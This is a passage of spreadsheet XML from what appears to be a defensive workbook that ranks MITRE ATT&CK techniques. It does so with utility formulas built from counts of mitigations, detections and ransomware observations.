        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L171">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M171" s="25">
        <v>0</v>
      </c>
      <c r="N171" s="51">
        <v>1</v>
      </c>
      <c r="O171" s="51">
        <v>2</v>
      </c>
      <c r="P171" s="51">
        <v>0</v>
      </c>
      <c r="Q171" s="51">
        <v>2</v>
      </c>
      <c r="R171" s="52" t="s">
        <v>769</v>
      </c>
      <c r="S171" s="51">
        <v>11</v>
      </c>
      <c r="T171" s="52" t="s">
        <v>770</v>
      </c>
      <c r="U171" s="51">
        <v>18</v>
      </c>
      <c r="V171" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29999999999999993</v>
      </c>
      <c r="W171">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>29</v>
      </c>
      <c r="X171">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Y171">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Z171">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA171">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB171">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC171" s="29" t="s">
        <v>210</v>
      </c>
      <c r="AD171" s="25" t="str" cm="1">
        <f t="array" ref="AD171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC171)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE171" s="25">
        <f>IF(AD171="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF171" s="25" t="str" cm="1">
        <f t="array" ref="AF171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC171)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG171" s="25">
        <f>IF(AF171="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH171" s="25" t="str" cm="1">
        <f t="array" ref="AH171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC171)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI171" s="25">
        <f>IF(AH171="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ171" s="25" t="str" cm="1">
        <f t="array" ref="AJ171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC171)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK171" s="25">
        <f>IF(AJ171="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL171" s="25" t="str" cm="1">
        <f t="array" ref="AL171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC171)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM171" s="25">
        <f>IF(AL171="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN171" s="60">
        <v>2</v>
      </c>
      <c r="AO171" s="51">
        <v>1</v>
      </c>
      <c r="AP171" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11986666666666665</v>
      </c>
      <c r="AQ171" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17733333333333332</v>
      </c>
      <c r="AR171" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17733333333333332</v>
      </c>
      <c r="AS171" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT171" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU17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72" spans="1:47" ht="32.1">
      <c r="A172" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11923333333333333</v>
      </c>
      <c r="B172" s="25">
        <f>SUM(H172,M172,V172)*(1+SUM(AE172,AG172,AI172,AK172,AM172))</f>
        <v>0.52566666666666673</v>
      </c>
      <c r="C172" s="25" t="s">
        <v>771</v>
      </c>
      <c r="D172" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E172" s="25" t="s">
        <v>772</v>
      </c>
      <c r="F172" s="51">
        <v>1</v>
      </c>
      <c r="G172" s="51">
        <v>1</v>
      </c>
      <c r="H172" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I172">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J172">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K172">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L172">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M172" s="25">
        <v>0</v>
      </c>
      <c r="N172" s="51">
        <v>0</v>
      </c>
      <c r="O172" s="51">
        <v>12</v>
      </c>
      <c r="P172" s="51">
        <v>0</v>
      </c>
      <c r="Q172" s="51">
        <v>0</v>
      </c>
      <c r="R172" s="51" t="s">
        <v>773</v>
      </c>
      <c r="S172" s="51">
        <v>11</v>
      </c>
      <c r="T172" s="51" t="s">
        <v>419</v>
      </c>
      <c r="U172" s="51">
        <v>14</v>
      </c>
      <c r="V172" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W172">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X172">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y172">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z172">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>12</v>
      </c>
      <c r="AA172">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.12</v>
      </c>
      <c r="AB172">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.12</v>
      </c>
      <c r="AC172" s="29" t="s">
        <v>774</v>
      </c>
      <c r="AD172" s="25" t="str" cm="1">
        <f t="array" ref="AD172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC172)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE172" s="25">
        <f>IF(AD172="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF172" s="25" t="str" cm="1">
        <f t="array" ref="AF172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG172" s="25">
        <f>IF(AF172="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH172" s="25" t="str" cm="1">
        <f t="array" ref="AH172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC172)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI172" s="25">
        <f>IF(AH172="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ172" s="25" t="str" cm="1">
        <f t="array" ref="AJ172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK172" s="25">
        <f>IF(AJ172="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL172" s="25" t="str" cm="1">
        <f t="array" ref="AL172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM172" s="25">
        <f>IF(AL172="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN172" s="61">
        <v>2</v>
      </c>
      <c r="AO172" s="51">
        <v>1</v>
      </c>
      <c r="AP172" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11923333333333333</v>
      </c>
      <c r="AQ172" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AR172" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AS172" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT172" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU17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73" spans="1:47" ht="48">
      <c r="A173" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11140761904761906</v>
      </c>
      <c r="B173" s="25">
        <f>SUM(H173,M173,V173)*(1+SUM(AE173,AG173,AI173,AK173,AM173))</f>
        <v>0.44740952380952392</v>
      </c>
      <c r="C173" s="25" t="s">
        <v>775</v>
      </c>
      <c r="D173" s="25" t="s">
        <v>241</v>
      </c>
      <c r="E173" s="25" t="s">
        <v>776</v>
      </c>
      <c r="F173" s="51">
        <v>1</v>
      </c>
      <c r="G173" s="51">
        <v>1</v>
      </c>
      <c r="H173" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I173">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J173">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K173">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L173">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M173" s="25">
        <v>0</v>
      </c>
      <c r="N173" s="51">
        <v>0</v>
      </c>
      <c r="O173" s="51">
        <v>24</v>
      </c>
      <c r="P173" s="51">
        <v>3</v>
      </c>
      <c r="Q173" s="51">
        <v>1</v>
      </c>
      <c r="R173" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S173" s="51">
        <v>2</v>
      </c>
      <c r="T173" s="51" t="s">
        <v>242</v>
      </c>
      <c r="U173" s="51">
        <v>15</v>
      </c>
      <c r="V173" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W173">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X173">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y173">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z173">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>28</v>
      </c>
      <c r="AA173">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.28000000000000003</v>
      </c>
      <c r="AB173">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.28000000000000003</v>
      </c>
      <c r="AC173" s="29" t="s">
        <v>442</v>
      </c>
      <c r="AD173" s="25" t="str" cm="1">
        <f t="array" ref="AD173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE173" s="25">
        <f>IF(AD173="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF173" s="25" t="str" cm="1">
        <f t="array" ref="AF173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG173" s="25">
        <f>IF(AF173="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH173" s="25" t="str" cm="1">
        <f t="array" ref="AH173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC173)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI173" s="25">
        <f>IF(AH173="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ173" s="25" t="str" cm="1">
        <f t="array" ref="AJ173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK173" s="25">
        <f>IF(AJ173="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL173" s="25" t="str" cm="1">
        <f t="array" ref="AL173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM173" s="25">
        <f>IF(AL173="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN173" s="52">
        <v>2</v>
      </c>
      <c r="AO173" s="51">
        <v>1</v>
      </c>
      <c r="AP173" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11140761904761906</v>
      </c>
      <c r="AQ173" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14913650793650798</v>
      </c>
      <c r="AR173" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14913650793650798</v>
      </c>
      <c r="AS173" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT173" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU17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74" spans="1:47" ht="63.95">
      <c r="A174" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.2566666666666671E-2</v>
      </c>
      <c r="B174" s="25">
        <f>SUM(H174,M174,V174)*(1+SUM(AE174,AG174,AI174,AK174,AM174))</f>
        <v>0.52566666666666673</v>
      </c>
      <c r="C174" s="25" t="s">
        <v>777</v>
      </c>
      <c r="D174" s="25" t="s">
        <v>502</v>
      </c>
      <c r="E174" s="25" t="s">
        <v>778</v>
      </c>
      <c r="F174" s="51">
        <v>1</v>
      </c>
      <c r="G174" s="51">
        <v>1</v>
      </c>
      <c r="H174" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I174">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J174">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K174">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L174">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M174" s="25">
        <v>0</v>
      </c>
      <c r="N174" s="51">
        <v>0</v>
      </c>
      <c r="O174" s="51">
        <v>0</v>
      </c>
      <c r="P174" s="51">
        <v>0</v>
      </c>
      <c r="Q174" s="51">
        <v>0</v>
      </c>
      <c r="R174" s="52" t="s">
        <v>779</v>
      </c>
      <c r="S174" s="51">
        <v>14</v>
      </c>
      <c r="T174" s="52" t="s">
        <v>780</v>
      </c>
      <c r="U174" s="51">
        <v>17</v>
      </c>
      <c r="V174" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W174">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X174">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y174">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z174">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA174">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB174">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC174" s="29" t="s">
        <v>781</v>
      </c>
      <c r="AD174" s="25" t="str" cm="1">
        <f t="array" ref="AD174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC174)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE174" s="25">
        <f>IF(AD174="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF174" s="25" t="str" cm="1">
        <f t="array" ref="AF174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC174)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG174" s="25">
        <f>IF(AF174="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH174" s="25" t="str" cm="1">
        <f t="array" ref="AH174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC174)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI174" s="25">
        <f>IF(AH174="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ174" s="25" t="str" cm="1">
        <f t="array" ref="AJ174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC174)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK174" s="25">
        <f>IF(AJ174="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL174" s="25" t="str" cm="1">
        <f t="array" ref="AL174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC174)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM174" s="25">
        <f>IF(AL174="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN174" s="52">
        <v>0</v>
      </c>
      <c r="AO174" s="51">
        <v>0</v>
      </c>
      <c r="AP174" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.2566666666666671E-2</v>
      </c>
      <c r="AQ174" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AR174" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AS174" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT174" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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75" spans="1:47" ht="48">
      <c r="A175" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.2566666666666671E-2</v>
      </c>
      <c r="B175" s="25">
        <f>SUM(H175,M175,V175)*(1+SUM(AE175,AG175,AI175,AK175,AM175))</f>
        <v>0.52566666666666673</v>
      </c>
      <c r="C175" s="25" t="s">
        <v>782</v>
      </c>
      <c r="D175" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E175" s="25" t="s">
        <v>783</v>
      </c>
      <c r="F175" s="51">
        <v>1</v>
      </c>
      <c r="G175" s="51">
        <v>1</v>
      </c>
      <c r="H175" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I175">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J175">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K175">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L175">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M175" s="25">
        <v>0</v>
      </c>
      <c r="N175" s="51">
        <v>0</v>
      </c>
      <c r="O175" s="51">
        <v>0</v>
      </c>
      <c r="P175" s="51">
        <v>0</v>
      </c>
      <c r="Q175" s="51">
        <v>0</v>
      </c>
      <c r="R175" s="52" t="s">
        <v>547</v>
      </c>
      <c r="S175" s="51">
        <v>13</v>
      </c>
      <c r="T175" s="52" t="s">
        <v>784</v>
      </c>
      <c r="U175" s="51">
        <v>18</v>
      </c>
      <c r="V175" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W175">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X175">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y175">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z175">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA175">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB175">
